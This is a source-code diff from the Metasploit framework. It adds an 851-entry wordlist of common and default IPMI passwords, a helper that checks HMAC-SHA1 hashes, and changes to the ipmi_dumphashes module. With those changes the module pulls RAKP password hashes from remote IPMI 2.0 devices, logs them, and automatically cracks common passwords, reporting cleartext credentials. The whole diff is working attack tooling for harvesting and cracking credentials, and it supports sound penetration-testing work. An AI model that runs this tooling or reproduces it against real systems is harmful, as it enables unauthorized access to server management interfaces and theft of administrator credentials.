Cleanup, reporting, and automatic cracking

data/wordlists/ipmi_passwords.txt

@@ -0,0 +1,851 @@
+ADMIN
+PASSW0RD
+calvin
+admin
+root
+computer1
+changeme
+superuser
+4rfv$RFV
+password
+123456
+asdlkj
+Letmein2
+111111
+Flamenco
+1q2w3e4r
+birdshit
+237723
+gandalf6
+maria1988
+angel2000
+4rfvbhu8
+bmw12345
+letmein2
+P@ssw0rd
+12qw!@QW
+12345678
+monkeybutt
+zero2hero
+security
+letmein1
+Password1
+calvin22
+admin123
+123456789
+12345
+p@ssw0rd
+amilopro
+adminadmin
+albatros
+freedumb1
+face2face
+aztech
+antibiotico
+1qaz2wsx
+nopermission
+imperial
+Winston1
+123qwe
+odiotodo
+get2it
+evilpenguin
+changemes
+asdf1234
+Administrator
+siemens123
+hpinvent
+butt
+brian0711
+a12345678
+1234
+123
+fresher
+012012
+administrator
+Welcome123
+Tokyo1
+123qweASD
+funshion
+doris321
+zaq1xsw2
+test
+letmein
+kalimera
+goethe
+debugs
+compaq
+cisco
+carpediem
+blabla12
+bios
+apa123
+abcd1234
+Parasol1
+23skidoo
+!QAZ2wsx
+ncc1701d
+john2008
+ipax
+angusyoung
+Nemesis1
+Aloysius
+zodiac666
+soccer1
+pandemonium
+orpheus
+netnet
+lifeline
+blabla
+abc123
+Welcome0
+test123
+sun12345
+secure123
+redhat
+poepchinees
+mackousko
+level10
+kuku
+ilovetessa
+f4g5h6j7
+dropship
+bobthebuilder
+barbusse
+aristoteles
+apollo11
+a13a13
+RUPRECHT
+P4ssw0rd
+14111982
+1234ABCD
+progr3ss
+cheng1234
+winston
+wibbles
+toor
+rootroot
+root123
+qwerty
+qweQWE123
+qazwsx123
+q1w2e3r4
+q1q1q1
+prepaid
+pokemon!
+poi098
+pepsi2008
+parmesan
+leoleo
+junker
+johnny50
+hongkong
+freedom
+flapjack
+cherokee
+callofduty
+bohemia
+benitocameloo
+babyface
+augmentin
+asdfhjkl
+admin1234
+abcdef3
+Welcome1
+P@$$w0rd
+Hamster
+Avalanche
+1997
+125401
+123zxc123
+123qweasdzxc
+123qwe!@#
+112233
+04051995
+q3kze7q
+password201
+m45t3rm1nd
+jander1
+blackonblack
+1qaz@WSX
+x
+winston1
+welcome1
+vitesse
+siempre!
+shuriken
+savanna
+richard#1
+parolamea
+oceans11
+nas123
+megatron
+liquidtension
+linkin123
+letmesee
+l0v3m3
+kane
+k4hvdq9tj9
+jack1998
+itsasecret
+inverter
+happyhippo
+hannover96
+foo123
+enter123321
+enter123
+dikdik
+cisco123
+changeme123
+bigred23
+asdewq
+ardrossan
+an0th3r
+ZAQ!2wsx
+Reptile1
+Qwerty123
+Password@1
+Password123
+Password#1
+Pass1234
+P@ssword
+Haemorrhage
+8253
+2bornot2b
+2718281828
+22
+1q2w3e4r5t
+159357**
+131313
+123123
+121212
+11111111
+111
+10111011
+topsecret
+test1234
+snickers
+skywalker
+secret
+salamander
+rutabaga
+rotrot
+rosedale
+rollerblade
+ringer
+revision
+razor
+qwerty7
+qwerty12
+qwert
+qazxswedc123
+qazwsx
+proba123
+powerpower
+powder1
+poloppolop
+plopplop
+penelope
+pathology
+passw0rd
+offshore
+not4u2c
+nopass
+nitram
+nerdnerd
+mirrormirror
+mi
+mercedes
+maxima
+master
+magex
+loran123
+lol
+kingswood
+keystone
+kalvin
+juliette
+icecream
+hobbs
+hello123
+he
+grouper
+gravity
+gravis
+gizmo
+fubar
+foobar
+flying
+flyboy
+fernandes
+fastweb
+exploit
+dweeble
+dimdim
+delta
+cy
+changeme1
+catfish
+carol
+cardinal
+calvin1
+calliope
+brother
+blizzard
+blahblah
+bier
+asd
+aq12wsxz
+apricot
+apple
+airlines
+admini
+access
+abusive
+abra
+Windows1
+Un1verse
+ROOT
+Qwerty1!
+Password
+PASSWORD
+P@ssw0rd!
+OEM
+Letmein1
+KNIGHT
+Israel123
+Christmas
+Chester1
+COMPAQ
+CALVIN
+963258
+584620
+225225
+201036
+2010
+198624
+146890
+130590
+123258
+082208
+012465
+zzzz
+ytrewq
+xxxxxxxx
+xxxxxx
+xpsm1210
+xerox
+wombat
+windows7
+weblink
+ventilator
+valentino
+totototo
+toptop
+tmp123
+testtest
+tester
+test1
+taki
+system1
+sysadmin
+stanley
+spike04
+sofuck
+sofresh
+simonb
+shin
+setmefree
+semmi
+seekanddestroy
+secure6
+saynomore
+sasman
+samsun
+salope
+root4
+ronson
+roman123
+riobravo
+rikitiki
+rayong1234
+randy007
+qwertz123
+qwerty77
+qwerty123
+qwerty09
+qwert12345
+qweqweqwe
+qweasd123
+qwe123!@#
+qwe123
+qwas12
+quepasa
+qscwdv
+qq123456
+qazxsw2
+qazwsx123456
+qaz123
+q1q2q3q4
+q1q1q1q1
+powermax
+plokijuh
+pizza42
+pieceofshit
+phoenix602
+peter123
+password55
+password209
+passw0rd1
+passion12
+pass123
+pantera69
+pa$$word
+pa$$w0rd
+p3t3rpan
+opengate
+ontology
+omgomg123
+number66
+nova21
+nike2008
+n0d0ubt1
+mvemjsunp
+mustang70
+munchkin10
+mujama
+muffinman
+mikeiscool
+megabit
+mar1jane
+mama1234
+madman18
+luke1993
+ludacris
+lord1234
+lopata
+lolipop2
+lofasz
+localadmin
+letmeout
+lenor
+lemon123
+langke
+lalala
+l8rsk8r
+kusakusa
+krakonos
+km123456
+kingofthehill
+keepout123
+karmal
+karkulka
+kakala
+k123
+ji394su3
+jackson88
+integra99
+integra18
+indonesiaraya
+iamthebest
+hyperdrive
+huawei
+howard03
+hero777
+helson
+hashimoto
+hasan12345
+hanseatic
+hallo123
+hallo12
+grapenuts
+gorefest
+goldstar
+godblessyou
+gfhjkm
+getoutofhere
+genius123
+freetown1
+freedom35
+fotos1
+florida69
+fischer123
+fire1818
+figarofigaro
+ficken2000
+faszom
+f18hornet
+f00b4r
+extazy
+eragon1
+easyway
+easy123
+duffy123
+dropzone
+dennis96
+deneme
+d3ft0n3s
+d1ngd0ng
+d0dger
+d00rmat
+csigabiga
+crew10
+credu
+crashbandicoot
+consults
+collins123
+ciscocisco
+ciang
+chile62
+check123
+ch4ng3m3
+catinthehat
+carla123
+calvin99
+calvin!
+calv1n
+calamar
+bubububu
+bluespot
+blubje
+black321
+bla123
+bigbuddy
+banane1
+asdasd
+asdQWE123
+asd123qwe
+anakonda
+alpargata
+alarcon
+adoado
+abrakadabra
+abcd-1234
+abc123!!
+abc#123
+a1b2c3d4e5f6
+a1b2c3d4e5
+a123456
+a11b12c13
+Zaq1xsw2
+Und3rGr0und
+TrustNo1
+Test1234
+Super123
+Summer12
+Silicon1
+Runaway1
+Republic1
+Qwer!234
+P@ssword123
+P@55w0rd
+P@$$word
+P@$$w0rD
+Operator
+Newpass1
+MKO)9ijn
+Lasvegas1
+Insecure
+Impatiens
+INTERNAT
+Boromir1
+Berman
+Asdfg123
+Asd123
+@WSX1qaz
+88888888
+874365
+832531
+735841
+666001
+570912
+56565656
+545981
+43046721
+3stones
+38483848
+311147
+2brnot2b
+29082908
+2468369
+23041979
+22242224
+222101
+22071979
+21101981
+20742074
+2071184
+20572057
+20552055
+20132013
+20112011
+1q2w3e
+1a2s3d4f
+19511951
+19501950
+19491949
+187cop
+17841784
+17201720
+17161716
+159753456
+147896325
+146688
+1456
+12qwaszx
+12qw34er
+123qwerty
+123mudar
+1234qwer!
+1234Qwer
+1234567890qwertyuiop
+123454321
+123412345
+123.com
+12201220
+12121212
+11112222
+1020304050
+10144
+10143
+10135
+10118
+10101010
+0okmnji9
+06061977
+!Q2w#E4r
+zse4rfv
+zmalqp10
+zazazaza
+zaxscdvf
+zaqwsxcde
+zaq1@WSX
+yyl
+yuiop
+yellow22
+yellow123
+yakiniku
+yabadabadoo
+xitgmLwmp
+xdr56tfc
+whitebird
+west123
+wave123
+wachtwoord
+w8w00rd
+w00tw00t
+vlis
+vivivi
+vitaly
+virginia11
+vince123
+viewmaster
+vatten
+vatefairefoutre
+united99
+united123
+triangulation
+tj1234
+titkos
+tiger123
+throwaway
+three4me
+testbed
+temppass
+temp1234
+temp11
+telefone
+tarantula1
+tagada
+sysu
+system32
+strasburg
+start123
+skysky21
+shakyamuni
+sclg
+sanayounes
+samsung34
+sallasana
+s3cur3d
+round123
+root1234
+reformation
+redpoint
+redorblue
+raritan
+rais
+qwerty1234567890
+qwerqaz
+qweewq123
+qweasdzxc2
+qweasd789
+qwe123.
+qazzxc
+qazwsx!@#
+qazw1234
+qaz74123
+pswrdpswrd
+primat
+portakal1
+picus
+phishfood
+petert999
+patrickb123
+password1`
+omfglol1
+nottelling
+nobchan
+new_password
+netadmin
+net101
+nemtom1
+n0ttelling
+mwmwmw
+mumuland
+mexx6399
+mcknight88
+masterok
+mainstreet
+maine207
+m1r4nd4
+m0t0rhead
+lkilogmL
+linux99
+lbyjpfdh
+labas123
+kukareku
+krumholz
+kolobezka
+kenzan
+kcm
+kali2002
+kalap
+k1rs1kka
+juke2008
+jtjd
+jiemou3i
+jbvm
+hogehoge
+haslo123
+harley1985
+gowest!
+gomachan
+gigi99
+ghbdtnbr
+gfhjkmrf
+gbpltw
+g8keeper
+fuckbitchesgetmoney
+formeforme
+flat24
+flaquito6
+f00sball
+f00bar
+ezit
+dream182
+delled0
+darwin99
+daemon09
+d0m1n0
+cukorborso
+cti4ever
+cpe1704tks
+compaq2003
+cisko
+changeme20
+cdwv
+cdn123
+cbtp
+cairell
+cabajka
+c@lvin
+burek123
+bublik
+bomba
+barbetta
+baofeng
+b4lls4ck
+athlon64
+aspirine
+asdlkj123
+asdlkj12
+aqua2000
+aqq123
+apstndp
+anyadhogyvan
+anakonda1
+akula123
+adminpass
+admin01
+admin001
+accobra
+abhaile1
+abcdpass
+abc123d4
+abang78
+a1rplan3
+Zxasqw12
+What3v3r
+Varadero
+TheLast1
+Tamara01
+T4urus
+SunnyJim7
+Suckit1
+Runner11
+R3volution
+Qwe12345
+QAWSEDRF
+Q!W@E#R$
+Polar123
+Passw0rd1111
+PassW0rd
+Pa22w0rd
+P@$$W0RD
+M1cha3l
+M
+LonDon
+Kia123
+Joel1234
+IPMI
+George123
+Crocodile1
+Chocolate19
+Aurora01
+Admin@123
+Admin123
+9ijn7ygv
+9641
+788111
+749174
+6922374
+643558
+4rfv%TGB
+493749
+3l3ctr1c
+343guiltyspark
+2keeper
+24041975
+23712371
+23051979
+21121477
+20682068
+20562056
+1qazxsw2
+1qazxcvb
+1qaz2wsx3edc
+1qaz0okm
+1qaz!QAZ
+1q2w3e4r5t6y
+1q2w3e4r..
+1keeper
+1340hd
+123cztery
+1234qwer`
+12345678abc
+123132123
+116572
+00850085
+*password
+!Q2w3e4r

lib/rex/proto/ipmi/utils.rb

@@ -81,6 +81,10 @@ class Utils
 		username
 	end
 
+	def self.verify_rakp_hmac_sha1(salt, hash, password)
+		OpenSSL::HMAC.digest('sha1', password, salt) == hash
+	end
+
 end
 end
 end

modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb

@@ -17,7 +17,12 @@ class Metasploit3 < Msf::Auxiliary
 	def initialize
 		super(
 			'Name'        => 'IPMI 2.0 RAKP Remote Password Hash Retreival',
-			'Description' => 'Identify valid usernames and their hashed passwords through the IPMI 2.0 RAKP protocol',
+			'Description' => %q|
+				This module identifies IPMI 2.0 compatible systems and attempts to retrieve the 
+				HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a 
+				file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb
+				in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.
+				|,
 			'Author'      => [ 'Dan Farmer <zen[at]fish2.com>', 'hdm' ],
 			'License'     => MSF_LICENSE,
 			'References'  => 
@@ -33,7 +38,11 @@ class Metasploit3 < Msf::Auxiliary
 			OptPath.new('USER_FILE', [ true, "File containing usernames, one per line",
 				File.join(Msf::Config.install_root, 'data', 'wordlists', 'ipmi_users.txt')
 			]),
-			OptString.new('OUTPUT_FILE', [false, "File to save captured password hashes into"])
+			OptPath.new('PASS_FILE', [ true, "File containing common passwords for offline cracking, one per line",
+				File.join(Msf::Config.install_root, 'data', 'wordlists', 'ipmi_passwords.txt')
+			]),			
+			OptString.new('OUTPUT_FILE', [false, "File to save captured password hashes into"]),
+			OptBool.new('CRACK_COMMON', [true, "Automatically crack common passwords as they are obtained", true])
 		], self.class)
 
 	end
@@ -109,12 +118,13 @@ class Metasploit3 < Msf::Auxiliary
 			end
 
 			if rakp.error_code != 0
-				vprint_status("#{rhost} Returned error code #{rakp.error_code} for username #{username}: #{Rex::Proto::IPMI::RMCP_ERRORS[rakp.error_code].to_s}")
+				vprint_error("#{rhost} Returned error code #{rakp.error_code} for username #{username}: #{Rex::Proto::IPMI::RMCP_ERRORS[rakp.error_code].to_s}")
 				next
 			end
 
+			# TODO: Finish documenting this error field
 			if rakp.ignored1 != 0
-				vprint_status("#{rhost} Returned weird error code #{rakp.ignored1} for username #{username}")
+				vprint_error("#{rhost} Returned error code #{rakp.ignored1} for username #{username}")
 				next
 			end
 
@@ -129,37 +139,78 @@ class Metasploit3 < Msf::Auxiliary
 				username
 			)
 
-			found = "#{rhost} #{username}:#{hmac_buffer.unpack("H*")[0]}:#{rakp.hmac_sha1.unpack("H*")[0]}"
+			found = "#{rhost} Hash #{username}:#{hmac_buffer.unpack("H*")[0]}:#{rakp.hmac_sha1.unpack("H*")[0]}"
 			print_good(found)
+
+			# Write the rakp hash to the output file 
 			if @output
 				@output.write(found + "\n")
 			end
+
+			# Write the rakp hash to the database
+			report_auth_info(
+				:host	=> rhost,
+				:port   => rport,
+				:proto  => 'udp',
+				:sname	=> 'ipmi',
+				:user 	=> username,
+				:pass   => "#{hmac_buffer.unpack("H*")[0]}:#{rakp.hmac_sha1.unpack("H*")[0]}",
+				:source_type => "captured",
+				:active => true,
+				:type   => 'rakp_hmac_sha1_hash'
+			)
+
+			# Offline crack common passwords and report clear-text credentials
+			next unless datastore['CRACK_COMMON']
+
+			::File.open(datastore['PASS_FILE'], "rb") do |pfd|
+				passwords = pfd.read(pfd.stat.size).split("\n")
+				passwords << ""
+				passwords.uniq.each do |pass|
+					pass = pass.strip
+					next unless pass.length > 0
+					next unless Rex::Proto::IPMI::Utils.verify_rakp_hmac_sha1(hmac_buffer, rakp.hmac_sha1, pass)
+					print_good("#{rhost} Hash for user '#{username}' matches password '#{pass}'")
+
+					# Report the clear-text credential to the database
+					report_auth_info(
+						:host	=> rhost,
+						:port   => rport,
+						:proto  => 'udp',
+						:sname	=> 'ipmi',
+						:user 	=> username,
+						:pass   => pass,
+						:source_type => "cracked",
+						:active => true,
+						:type   => 'password'
+					)
+					break
+				end
+			end
 		end
 	end
 
 	def process_getchannel_reply(data, shost, sport)
-
 		shost = shost.sub(/^::ffff:/, '')
-
 		info = Rex::Proto::IPMI::Channel_Auth_Reply.new(data) rescue nil
 
-
 		# Ignore invalid responses
 		return if not info
 		return if not info.ipmi_command == 56
 
 		banner = info.to_banner
 
-		print_status("#{shost}:#{datastore['RPORT']} #{banner}")
+		print_status("#{shost} #{banner}")
 
 		report_service(
-			:host  => shost,
-			:port  => datastore['RPORT'],
+			:host  => rhost,
+			:port  => rport,
 			:proto => 'udp',
 			:name  => 'ipmi',
 			:info  => banner
 		)
 
+		# TODO:
 		# Report a vulnerablity if info.ipmi_user_anonymous has been set
 		# Report a vulnerability if ipmi 2.0 and kg is set to default
 		# Report a vulnerability if info.ipmi_user_null has been set (null username)
@@ -183,9 +234,22 @@ class Metasploit3 < Msf::Auxiliary
 		info
 	end
 
+	def setup
+		super
+		@output = nil
+		if datastore['OUTPUT_FILE']
+			@output = ::File.open(datastore['OUTPUT_FILE'], "ab")
+		end
+	end
+
+	def cleanup
+		super
+		@output.close if @output
+		@output = nil
+	end
 
 	#
-	# Helper methods (this didn't quite fit with existing mixins)
+	# Helper methods (these didn't quite fit with existing mixins)
 	#
 
 	attr_accessor :udp_sock
@@ -204,20 +268,6 @@ class Metasploit3 < Msf::Auxiliary
 		r[1] ? r : nil
 	end
 
-	def setup
-		super
-		@output = nil
-		if datastore['OUTPUT_FILE']
-			@output = ::File.open(datastore['OUTPUT_FILE'], "ab")
-		end
-	end
-
-	def cleanup
-		super
-		@output.close if @output
-		@output = nil
-	end
-
 	def rhost
 		datastore['RHOST']
 	end